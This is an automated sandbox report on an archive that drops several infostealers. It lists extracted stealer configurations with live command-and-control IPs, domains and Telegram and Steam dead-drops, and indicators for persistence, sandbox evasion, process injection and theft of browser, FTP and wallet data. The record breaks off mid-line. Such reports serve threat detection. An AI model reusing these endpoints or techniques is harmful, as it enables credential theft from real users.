Analysis
-
max time kernel
284s -
max time network
336s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
10-06-2024 10:50
Static task
static1
Behavioral task
behavioral1
Sample
AppGate_3.rar
Resource
win10-20240404-en
General
-
Target
AppGate_3.rar
-
Size
6.1MB
-
MD5
9568b301d38bd3fa10f65fb9fb56b96d
-
SHA1
7f1000c227585d8bc122182ce785960653051c62
-
SHA256
ef3b791caf3b6d690197d2ab9ffb04310e42f7a5a5744827325b2c2d241c25e0
-
SHA512
ff8cbecf3c224cdf0b01a9d4ce81525888e7ef9c09db0c2834ebbb814012442d18aac064ec0687b972bd081baf423caaa9fef70a5024e523b927c4f4bb9e7326
-
SSDEEP
196608:Fyi/km2ye6lT+hIYET0nnVhtYQmLHECOEKxbQ:Mq2L6RiIonokCOEz
Malware Config
Extracted
stealc
Extracted
vidar
https://t.me/r8z0l
https://steamcommunity.com/profiles/76561199698764354
-
user_agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
Extracted
redline
LogsDiller Cloud (TG: @logsdillabot)
5.42.65.63:14707
Extracted
risepro
77.91.77.67:58709
Extracted
lumma
https://greetclassifytalk.shop/api
https://distincttangyflippan.shop/api
https://macabrecondfucews.shop/api
https://greentastellesqwm.shop/api
https://stickyyummyskiwffe.shop/api
https://sturdyregularrmsnhw.shop/api
Signatures
-
Detect Vidar Stealer 3 IoCs
resource yara_rule behavioral1/memory/4512-976-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral1/memory/4512-980-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 behavioral1/memory/4512-978-0x0000000000400000-0x0000000000648000-memory.dmp family_vidar_v7 -
Modifies firewall policy service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" setup.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 1 IoCs
resource yara_rule behavioral1/memory/3436-1171-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell and hide display window.
pid Process 3840 powershell.exe 3800 powershell.exe 4360 powershell.exe 2944 powershell.exe 3748 powershell.exe 604 powershell.EXE -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Control Panel\International\Geo\Nation setup.exe -
Drops startup file 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk QsBxbMAfJNBQCdg_pg0H1RrR.exe -
Executes dropped EXE 24 IoCs
pid Process 2708 7z2406-x64.exe 4876 7zG.exe 2552 7zG.exe 4516 setup.exe 1588 SbOexcXltb2Agn2ru3rsEcbz.exe 2288 5dWOqDmgKaXGKYn8YSJ4kqBc.exe 1512 UveIvkZy0meSnpmxZkeJYnaa.exe 3336 _WP7kdOqbqZzzYP3lTi1fdVu.exe 3324 EujliRSqoNGxQSvgcZwYHM0a.exe 1380 f6McHUkv64D7xAPSGsYLgwj6.exe 3344 A83BCcdrPH0IdZ2cpT2yeQ_I.exe 2076 YkFbnF18WKlD_PdMU7QNB4GR.exe 2648 PfM9di0SFCgdQu5zud76avXo.exe 756 3bqsaxgdhYyZV67bGKzFoGv2.exe 4596 QsBxbMAfJNBQCdg_pg0H1RrR.exe 4276 03CZokS0HonJoqM4c6Xg0U7K.exe 4876 1v7DQzzvtFrGqTe3EOWskSNB.exe 4108 _WP7kdOqbqZzzYP3lTi1fdVu.tmp 2528 Install.exe 4212 linuxmultiMediastudio.exe 1084 linuxmultiMediastudio.exe 3544 Install.exe 1820 world.exe 4624 moigsaw.exe -
Loads dropped DLL 4 IoCs
pid Process 3372 Process not Found 4876 7zG.exe 2552 7zG.exe 4108 _WP7kdOqbqZzzYP3lTi1fdVu.tmp -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Registers COM server for autorun 1 TTPs 3 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe -
resource yara_rule behavioral1/files/0x000b00000001ac66-1277.dat vmprotect -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\RageMP131 = "C:\\Users\\Admin\\AppData\\Local\\RageMP131\\RageMP131.exe" UveIvkZy0meSnpmxZkeJYnaa.exe Set value (str) \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000\Software\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" QsBxbMAfJNBQCdg_pg0H1RrR.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 207 iplogger.org 208 iplogger.org -
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 111 api.myip.com 112 api.myip.com 114 ipinfo.io 115 ipinfo.io 282 ipinfo.io 283 ipinfo.io -
Drops file in System32 directory 4 IoCs
description ioc Process File opened for modification C:\Windows\System32\GroupPolicy setup.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini setup.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol setup.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI setup.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1512 UveIvkZy0meSnpmxZkeJYnaa.exe 1512 UveIvkZy0meSnpmxZkeJYnaa.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1588 set thread context of 4512 1588 SbOexcXltb2Agn2ru3rsEcbz.exe 118 PID 2648 set thread context of 3436 2648 PfM9di0SFCgdQu5zud76avXo.exe 127 PID 4276 set thread context of 4724 4276 03CZokS0HonJoqM4c6Xg0U7K.exe 128 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\readme.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7-zip.dll 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7z.dll 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\co.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hr.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\af.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kab.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ro.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sr-spl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\yo.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mng2.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nn.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Uninstall.exe 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\lt.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\si.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tt.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\License.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\da.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\th.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-tw.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7z.sfx 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\History.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fur.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\uz-cyrl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fi.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kk.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ky.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\mr.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\7zFM.exe 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\fy.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\hy.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\en.ttt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\tr.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ba.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\br.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\kaa.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ko.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\ne.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\de.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\az.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 7z2406-x64.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 7z2406-x64.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\rescache\_merged\4183903823\2290032291.pri taskmgr.exe File created C:\Windows\rescache\_merged\1601268389\715946058.pri taskmgr.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1380 sc.exe 4880 sc.exe 1372 sc.exe 3148 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 9 IoCs
pid pid_target Process procid_target 68 2288 WerFault.exe 109 2640 2288 WerFault.exe 109 4384 2288 WerFault.exe 109 3652 2288 WerFault.exe 109 1080 2288 WerFault.exe 109 2184 2288 WerFault.exe 109 2124 2288 WerFault.exe 109 4540 2288 WerFault.exe 109 196 2508 WerFault.exe 181 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5060 schtasks.exe 2968 schtasks.exe 1584 schtasks.exe 2996 schtasks.exe 4336 schtasks.exe 1048 schtasks.exe 4228 schtasks.exe 1504 schtasks.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 4296 timeout.exe 4944 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies registry class 23 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings OpenWith.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings cmd.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip 7z2406-x64.exe Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" 7z2406-x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" 7z2406-x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 7z2406-x64.exe -
NTFS ADS 1 IoCs
description ioc Process File created C:\Users\Admin\Downloads\7z2406-x64.exe:Zone.Identifier firefox.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 1768 OpenWith.exe 4752 taskmgr.exe -
Suspicious use of AdjustPrivilegeToken 28 IoCs
description pid Process Token: SeDebugPrivilege 4744 firefox.exe Token: SeDebugPrivilege 4744 firefox.exe Token: SeDebugPrivilege 4744 firefox.exe Token: SeDebugPrivilege 2708 7z2406-x64.exe Token: SeDebugPrivilege 2708 7z2406-x64.exe Token: SeDebugPrivilege 2708 7z2406-x64.exe Token: SeDebugPrivilege 2708 7z2406-x64.exe Token: SeDebugPrivilege 2708 7z2406-x64.exe Token: SeRestorePrivilege 4876 7zG.exe Token: 35 4876 7zG.exe Token: SeSecurityPrivilege 4876 7zG.exe Token: SeSecurityPrivilege 4876 7zG.exe Token: SeDebugPrivilege 4752 taskmgr.exe Token: SeSystemProfilePrivilege 4752 taskmgr.exe Token: SeCreateGlobalPrivilege 4752 taskmgr.exe Token: SeRestorePrivilege 2552 7zG.exe Token: 35 2552 7zG.exe Token: SeSecurityPrivilege 2552 7zG.exe Token: SeSecurityPrivilege 2552 7zG.exe Token: SeDebugPrivilege 2648 PfM9di0SFCgdQu5zud76avXo.exe Token: SeDebugPrivilege 4276 03CZokS0HonJoqM4c6Xg0U7K.exe Token: SeDebugPrivilege 4724 MSBuild.exe Token: SeBackupPrivilege 4724 MSBuild.exe Token: SeSecurityPrivilege 4724 MSBuild.exe Token: SeSecurityPrivilege 4724 MSBuild.exe Token: SeSecurityPrivilege 4724 MSBuild.exe Token: SeSecurityPrivilege 4724 MSBuild.exe Token: SeDebugPrivilege 4360 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 2708 7z2406-x64.exe 4744 firefox.exe 4744 firefox.exe 4876 7zG.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 2552 7zG.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4744 firefox.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe 4752 taskmgr.exe -
Suspicious use of SetWindowsHookEx 64 IoCs
pid Process 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 1768 OpenWith.exe 4744 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1768 wrote to memory of 3664 1768 OpenWith.exe 86 PID 1768 wrote to memory of 3664 1768 OpenWith.exe 86 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 3664 wrote to memory of 4744 3664 firefox.exe 78 PID 4744 wrote to memory of 828 4744 firefox.exe 80 PID 4744 wrote to memory of 828 4744 firefox.exe 80 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory of 4384 4744 firefox.exe 81 PID 4744 wrote to memory 